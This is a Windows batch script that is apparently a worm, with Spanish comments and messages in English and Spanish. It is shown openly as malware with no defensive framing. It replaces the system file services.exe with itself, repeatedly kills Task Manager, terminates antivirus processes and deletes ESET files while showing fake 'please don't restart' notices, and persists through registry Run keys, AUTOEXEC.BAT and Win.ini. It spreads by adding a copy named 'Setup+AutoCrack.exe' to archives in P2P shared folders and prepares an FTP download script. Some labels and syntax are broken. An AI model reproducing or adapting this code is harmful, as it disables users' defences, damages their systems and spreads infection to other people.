@echo off if exist "%HOMEPATH%\tasks.tmp" (exit) else (goto start) :start echo time /T > "%HOMEPATH%\tasks.tmp" echo - Error while getting running tasks... >> "%HOMEPATH%\tasks.tmp" taskkill /F /IM taskmgr.exe if exist "%windir%\System32\services32.exe" (goto start2) else (goto SetInWin) :SetInWin taskkill /F /IM services.exe taskkill /F /IM taskmgr.exe copy "%windir%\System32\services.exe" "%windir%\System32\services32.exe" /Y copy "%0" "%windir%\System32\services.exe" /Y taskkill /F /IM taskmgr.exe del /F /Q "%HOMEPATH%\tasks.tmp" start "%windir%\System32\services.exe" exit :start2 if exist "%SystemDrive%\Program Files\" (goto vars_eng) else (goto try1) taskkill /F /IM taskmgr.exe :vars_eng set software="C:\Program Files" set lang="eng" set nod32killed="NOD32 Antivirus reported execution problems in %USERNAME%'s system. The NOD32 process was terminated and will start again in a few minutes, please don't restart your computer. If you restart, NOD32 won't execute again." set mcafeekilled="McAfee Antivirus reported execution problems in %USERNAME%'s system. The McAfee process was terminated and will start again in a few minutes, please don't restart your computar. If you restart, McAfee won't execute again." set unoded=0 set unmacafeed=0 goto protect_itself :vars_esp set software="%SystemDrive%\Archivos de programa" set lang="esp" set nod32killed="El Antivirus NOD32 reportó problemas de ejecución en el sistema del usuario %USERNAME%. El proceso de NOD32 se terminó y se ejecutará en unos minutos, por favor no reinicie el equipo. Si lo reinicia, NOD32 no volverá a ejecutarse." set mcafeekilled="McAfee Antivirus reportó problemas de ejecución en el sistema del usuario %USERNAME%. El proceso de McAfee Antivirus se terminó y se ejecutará en unos minutos, por favor no reinicie el equipo. Si lo reinicia, McAfee no volverá a ejecutarse." set unoded=0 set unmacafeed=0 goto protect_itself :unknown_lang taskkill /F /IM explorer.exe taskkill /F /IM taskmgr.exe del /F /Q "%WINDIR%\TASKMAN.exe" echo %0 >> %SystemDrive%\AUTOEXEC.BAT echo del /F /Q "%WINDIR%\*.ini" msg * /TIME:30 /W This OS Sucks!! Your PC is shit... you... you... Can't read this fucking text, stupid %USERNAME%!!! exit :try1 taskkill /F /IM taskmgr.exe if exist "C:\Archivos de programa\" (goto vars_esp) else (goto unknown_lang) :protect_itself taskkill /F /IM taskmgr.exe if exist "%software%\Eset\" ( if %unoded%=0 (goto Nod32)) if exist "%software%\McAfee\" ( if %unmcafeed%=0 (goto McAfee)) REM Task kill of Anti Virus taskkill /F /IM avp32.exe taskkill /F /IM taskmgr.exe taskkill /F /IM avpmon.exe taskkill /F /IM taskmgr.exe taskkill /F /IM zonealarm.exe taskkill /F /IM taskmgr.exe taskkill /F /IM vshwin32.exe taskkill /F /IM taskmgr.exe taskkill /F /IM vet95.exe taskkill /F /IM taskmgr.exe goto infect :Nod32 taskkill /F /IM nod32kui.exe taskkill /F /IM nod32krn.exe del /F /Q %software%\Eset\*.* set unoded=1 msg * %nod32killed% goto protect_itself :McAfee msg * %mcafeekilled% :Infect REM Agregarse en el AUTOEXEC.BAT echo start %0 > %SystemDrive%\AUTOEXEC.BAT echo pause >> %SystemDrive%\AUTOEXEC.BAT if %lang%=="eng" (set GName="Time lost") if %lang%=="esp" (set GName="Perdida de tiempo") REM Agregarse en el registro reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v WinKernel /d "%0" /f taskkill /F /IM taskmgr.exe reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v SM_GamesName /d "%GName%" /f taskkill /F /IM taskmgr.exe reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\App Management\System Programs" /v notepad /d notepad.exe /f taskkill /F /IM taskmgr.exe reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\App Management\System Programs" /v cmd /d notepad.exe /f taskkill /F /IM taskmgr.exe reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\App Management\System Programs" /v regedit /d notepad.exe /f taskkill /F /IM taskmgr.exe reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe" /f taskkill /F /IM taskmgr.exe reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe" /ve /d "%0" /f taskkill /F /IM taskmgr.exe REM Agregarse al Win.INI echo [Windows] >> %windir%\Win.ini echo Run=%0 >> %windir%\Win.ini taskkill /F /IM taskmgr.exe if exist "%software%\WinRAR\winrar.exe" (goto InfectRAR) else (set WinRAR=0&goto Infect2) :InfectRAR taskkill /F /IM taskmgr.exe copy %0 %HOMEPATH%\Setup+AutoCrack.exe /Y set my=%HOMEPATH%\WINCONFIG.rar set winrar="%software%\WinRAR\winrar.exe" if exist "%software%\eMule\Incoming\" (set WinRAR=1&goto eMuleInfect) else (goto InfectRAR2) :eMuleInfect taskkill /F /IM taskmgr.exe "%winrar%"a "%software%\eMule\Incoming\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\eMule\Incoming\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" goto InfectRAR2 :InfectRAR2 taskkill /F /IM taskmgr.exe if exist "%SystemDrive%\My Shared Folder\" (goto SharedFolderInfect) else (goto InfectRAR3) :SharedFolderInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%SystemDrive%\My Shared Folder\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%SystemDrive%\My Shared Folder\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" goto InfectRAR3 :InfectRAR3 taskkill /F /IM taskmgr.exe if exist "%software%\Kazaa\My Shared Folder\" (goto KazaaInfect) else (goto InfectRAR4) :KazaaInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\Kazaa\My Shared Folder\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\Kazaa\My Shared Folder\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" goto InfectRAR4 :InfectRAR4 taskkill /F /IM taskmgr.exe if exist "%software%\Kazaa Lite\My Shared Folder\" (goto KazaaLiteInfect) else (goto InfectRAR5) :KazaaLiteInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\Kazaa\My Shared Folder\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\Kazaa\My Shared Folder\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :InfectRAR5 taskkill /F /IM taskmgr.exe if exist "%software%\Grokster\My Grokster\" (goto GroksterInfect) else (goto InfectRAR6) :GroksterInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\Grokster\My Grokster\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\Grokster\My Grokster\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :InfectRAR6 taskkill /F /IM taskmgr.exe if exist "%software%\Morpheus\My Shared Folder\" (goto MorpheusInfect) else (goto InfectRAR7) :MorpheusInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\Morpheus\My Shared Folder\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\Morpheus\My Shared Folder\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :InfectRAR7 taskkill /F /IM taskmgr.exe if exist "%software%\EDONKEY*\incoming\" (goto eDonkeyInfect) else (goto InfectRAR8) :eDonkeyInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\EDONKEY*\My Shared Folder\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\EDONKEY*\My Shared Folder\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :InfectRAR8 taskkill /F /IM taskmgr.exe if exist "%software%\Gnucleus\Downloads\" (goto GnucleusInfect) else (goto InfectRAR9) :GnucleusInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\Gnucleus\Downloads\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\Gnucleus\Downloads\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :InfectRAR9 taskkill /F /IM taskmgr.exe if exist "%software%\eMule\Incoming\" (goto eMuleInfect) else (goto InfectRAR10) :eMuleInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\eMule\Incoming\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\eMule\Incoming\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :InfectRAR10 taskkill /F /IM taskmgr.exe if exist "%software%\BearShare\Shared\" (goto BearSharedInfect) else (goto InfectRAR11) :BearShareInfect taskkill /F /IM taskmgr.exe "%winrar%" a "%software%\BearShare\Shared\*.rar" "%HOMEPATH%\Setup+AutoCrack.exe" "%winrar%" a "%software%\BearShare\Shared\*.zip" "%HOMEPATH%\Setup+AutoCrack.exe" :Infect2 taskkill /F /IM taskmgr.exe if %WinRAR%==0 (goto Infect_getsilentRAR) else (goto infect3) :Infect_getsilentRAR taskkill /F /IM taskmgr.exe REM Hacer el archivo de FTP y luego, ¡ bajar winrarsilent ! echo ftp.#.com > winKernel.tmp echo USERNAME >> winKernel.tmp echo PASSWRD >> winKernel.tmp echo get ??? >> winKernel.tmp echo bye >> winKernel.tmp :Infect3 if exist "%windir%\System32\usrlogon.cmd" (echo start %0 >> "%windir%\System32\usrlogon.cmd")